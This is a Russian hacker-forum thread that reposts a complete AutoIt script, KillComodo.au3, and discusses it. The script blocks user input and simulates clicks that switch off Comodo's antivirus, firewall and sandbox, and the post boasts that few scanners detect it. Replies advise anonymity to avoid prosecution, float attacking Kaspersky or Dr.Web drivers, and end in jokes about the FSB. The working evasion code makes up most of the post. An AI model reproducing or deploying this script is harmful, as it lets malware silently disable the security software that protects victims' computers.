Ломаем антивирусы


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161
Рад, что на хакзоне наконец-то начили писать нормальные и актуальные статьи, вот наткнулся на одну интересную статейку:

Привет всем. Давно мучает идея, можно ли найти универсальный способ против любого антивируса?

И тут на глаза случайно попался довольно простой в обращении язык AutoIt v.3. Изначально язык предназначен для управления графическим интерфейсом Windows. Я так подумал, и решил, что с помощью него можно иммитировать нажатия мыши и отключать антивирусы пользовательским способом, как делают это обычные юзеры.

Первой жертвой я выбрал неизвестный мне ранее вирус Comodo (просто стоял у моей тёти на компьютере). Хочу сразу предоставить код KillComodo.au3:
Код:
#cs ----------------------------------------------------------------------------
 
AutoIt Version: 3.3.8.1
Author:		 Ryder95
 
Script Function:
Отключает всю систему защиту Comodo Internet Security Premium
 
#ce ----------------------------------------------------------------------------
 
; Script Start - Add your code below here
Global $msg[4];Переменная для информации об окне оповещения
Break(0);Попытка отключения возможности отключения скрипта пользователем
If @OSVersion="WIN_7" then $WarnName="" ;Имя окна оповещения
If @OSVersion="WIN_8" then $WarnName="COMODO Оповещение об отключении компонента";Имя окна оповещения
BlockInput(1) ;Попытка отключить устройства ввода пользователя
Select ;Запуск Comodo
  Case not WinExists("COMODO Internet Security Premium ");Если программа не запущена...
  Run(@ProgramFilesDir & "\COMODO\COMODO Internet Security\cistray.exe --shortcut");...то запуск программы
  AutoItSetOption("WinTitleMatchMode",3);Настройки поиска главного окна
  WinWaitActive("COMODO Internet Security Premium ","",10);Ждём, когда активируется
  Case not WinActive("COMODO Internet Security Premium ");Если не активна...
  WinActivate("COMODO Internet Security Premium ");...то активируем главное окно
EndSelect 
$main=WinGetPos("COMODO Internet Security Premium ") ;Получение позиций главного окна
sleep(500) ;Пауза (дать компьютеру успеть выполнить действие на экране)
MouseClick("left",$main[0]+Round($main[2]*0.8844),$main[1]+Round($main[3]*0.2948),1,100) ;Отключение защиты
sleep(5000) ;Пауза
MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+Round($main[3]*0.3137),1,100) ;Отключение антивируса
OffWarn();вызов функции, работающей с окном оповещения
WinActivate("COMODO Internet Security Premium ");Активируем окно Comodo
sleep(500) ;Пауза
MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+round($main[3]*0.4008),1,100) ;Отключение фаервола
OffWarn()
WinActivate("COMODO Internet Security Premium ") ;Активируем окно Comodo
sleep(500) ;Пауза
MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+round($main[3]*0.4877),1,100) ;Отключение Авто-Sandbox
OffWarn()
WinActivate("COMODO Internet Security Premium ") ;Активируем окно Comodo
sleep(500) ;Пауза
WinClose("COMODO Internet Security Premium ");закрываем главное окно
 
Func OffWarn();функция, работающая с окном оповещения
  $s=WinWait($WarnName,"",5);Ждём появления оповещения
  if @OSVersion="WIN_8" and $s=0 then Return
  WinActivate($WarnName)
  Select
  Case @OSVersion="WIN_8"
  $msg=WinGetPos($WarnName) ;Получаем координаты окна оповещения
  Case @OSVersion="WIN_7"
  $msg[0]=@DesktopWidth-462
  $msg[1]=@DesktopHeight-round(@DesktopHeight*0.0666)-289
  $msg[2]=462
  $msg[3]=289
  EndSelect
  if $msg[0]+$msg[2]<=@DesktopWidth  then ;Если окно оповещения не заходит за правую границу стола
  MouseClick("left",$msg[0]+Round($msg[2]*0.9264),$msg[1]+Round($msg[3]*0.6989),1,100)
  Else
  MouseClick("left",@DesktopWidth-20,$msg[1]+Round($msg[3]*0.6989),1,100)
  endif
  sleep(500) ;Пауза
  if @DesktopHeight-$msg[1]-$msg[3]>=round($msg[3]*0.044) Then ;Если меню снизу
  if ($msg[0]>=0) and ($msg[0]+$msg[2]<=@DesktopWidth) then MouseClick("left",$msg[0]+Round($msg[2]*0.1233),$msg[1]+Round($msg[3]*1,006),1,100) ;Если окно оповещения не заходит за границы стола
  if $msg[0]<0 then MouseClick("left",Round($msg[2]*0.0735),$msg[1]+Round($msg[3]*1,006),1,100) ;если окно за левой границей
  if $msg[0]+$msg[2]>@DesktopWidth then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*1,006),1,100) ;если окно за правой границей
  Else
  if ($msg[0]>=0) and ($msg[0]+$msg[2]<=@DesktopWidth) then MouseClick("left",$msg[0]+Round($msg[2]*0.1190),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно оповещения не заходит за границы
  if $msg[0]<0 then MouseClick("left",Round($msg[2]*0.0714),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно за левой границей
  if $msg[0]+$msg[2]>@DesktopWidth then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно за правой границей
  EndIf 
  sleep(500) ;Пауза
  MouseClick("left",$msg[0]+round($msg[2]*0.6082),$msg[1]+round($msg[3]*0.9377),1,100)
EndFunc

Минусы и недочёты скажу сразу, проверял только на двух ОС - Windows 7 (x86) и Windows 8 (x64)

Минусы на семёрке:

-Проблема с выбором времени при отключении функций антивируса
-Программа не будет работать, если на рабочем столе включено автоматическое исчезание панели задач
-Когда пытался записать видео с работой скрипта - скрипт просто не смог запуститься, причём когда захват видео отключался, скрипт работал
Минусы на восьмёрке:
-Скомпилированная программа не запускается просто так, она требует запуск от имени администратора, когда же происходит запуск администратором, Comodo ругается на неё, хотя даёт выбор - запустить или нет. Но велика возможность того, что пользователь блокирует программу и задача не будет выполнена.

Также проверил программу на блокировку антивирусами на сайте .

В общем, 3 антивируса из 46 признали KillComodo вирусом, и что странно, сам Comodo не в их числе.

Очень хотелось бы отзывов, предложений по поводу "можно ли дальше развивать данную идею?". Если это возможно, то хотелось бы найти единомышленников.

Источник, а также там можно связаться с автором:

Видео использования программы:

 
B

BioNIX

Гость
X-Shar, Ну единомышленников найдешь, а дальше последствия, рано или поздно все обернется против, если хочешь вести такую тему, то надо полностью быть анонимом, и никакой информации о себе не распространять в сети, мало ли отслеживание по IP или тем же аккаунтам типа GOOGLE который объединит различные аккаунты входящие с одного IP и как не печально это может закончится очень плохо. Хакерство во благо это хорошо, потому, что таким способом ищется уязвимость в антивирусах, и рано или поздно этим антивирусом отправится отчет его работы и сбоя, и какой процесс и служба вызвала сбой в антивирусе, будет выпущен патч и дырку залатают, с такой стороны искать уязвимости можно и получить номинацию, а если делать во вред то можно получить и срок длительный. Я думаю, что во благо да это идея хорошая, но посчитают ли службы это благим намерением, это вопрос времени.
 
B

BioNIX

Гость
Это очень серьезный язык программирования и развивается очень хорошо предпочтение идет именно по нему, и вирусы пишутся именно на этом языке, и много антивирусов не могут определить этот вид вируса.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161
если хочешь вести такую тему, то надо полностью быть анонимом, и никакой информации о себе не распространять в сети, мало ли отслеживание по IP или тем же аккаунтам типа GOOGLE который объединит различные аккаунты входящие с одного IP и как не печально это может закончится очень плохо.
Именно поэтому я и не выложил бинарник, да и автор не я если что ! ;)
Это очень серьезный язык программирования и развивается очень хорошо предпочтение идет именно по нему, и вирусы пишутся именно на этом языке, и много антивирусов не могут определить этот вид вируса.
AutoIt - Это не серьёзно, надо писать вирусы на С++, или языках близких к ассеблеру !

Вот например на каспере уже этот способ не сработает, т.к. он лочит попытку виртуального взаимодействия, доктор кстати тоже + требует ввести капчу !

А вот если попытаться вызвать ошибку в драйвере каспера, или веба, вот тогда может получится отключить антивирус ! sm3888
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
да и автор не я если что ! ;)
Мы то тебе верим,а вот что скажет специализированный отдел...А багов у этого скрипта ещё предостаточно (да и наверное не все ещё выявлены),но для экспериментов очень даже интересная вещь.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 054
Репутация
8 161
Ну вот доприкалывался, уже какой-то микроавтобус около дома стоит с тонированными окнами, похоже перехватывают сигнал ! sholoh it
Говорил-же надо-было SSL внедрять ! wacko88
И не стыдно вам, я хотел пошутить, а уже позвонили, сообщили в ФСБ ! ohmy88

Вот и верь после этого людям ! ogo-go
 

BLONDY HACKER

:))
Форумчанин
Регистрация
07.12.2012
Сообщения
2 083
Репутация
333
Ну вот доприкалывался, уже какой-то микроавтобус около дома стоит с тонированными окнами, похоже перехватывают сигнал ! sholoh it

Всё, походу забрали нашего Олега i cray fear
s7.rimg.info_b7948de60c87eb7d1b529c85e0de821e.gif
скидываемся
s2.rimg.info_89da1ccc202e36280db3211c4d54f837.gif
кто сколько может, попробуем
s10.rimg.info_c4f00c179639f4b69cec171cdf9c286e.gif
выкупить.
 

BLONDY HACKER

:))
Форумчанин
Регистрация
07.12.2012
Сообщения
2 083
Репутация
333
Неужели i cray никого не волнует судьба Олега??ogo-go После долгих переговоров - остановились на сумме 5000за выкуп. Покаohmy88 дяденьки полицейские добрые, надо успеть выкупитьnea88
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Неужели никого не волнует судьба Олега??
Да понимаешь.Ленок-бабла нетI'm sorry,ваще ни копья в кармане.После того как Олег перестал к нам с Люськой в буфет ходить,дела совсем встали...теперь наверное по миру пойдём с протянутой рукой.Олегу могу лишь помочь сухарями и чаем,больше ни фига нет((
 
Верх Низ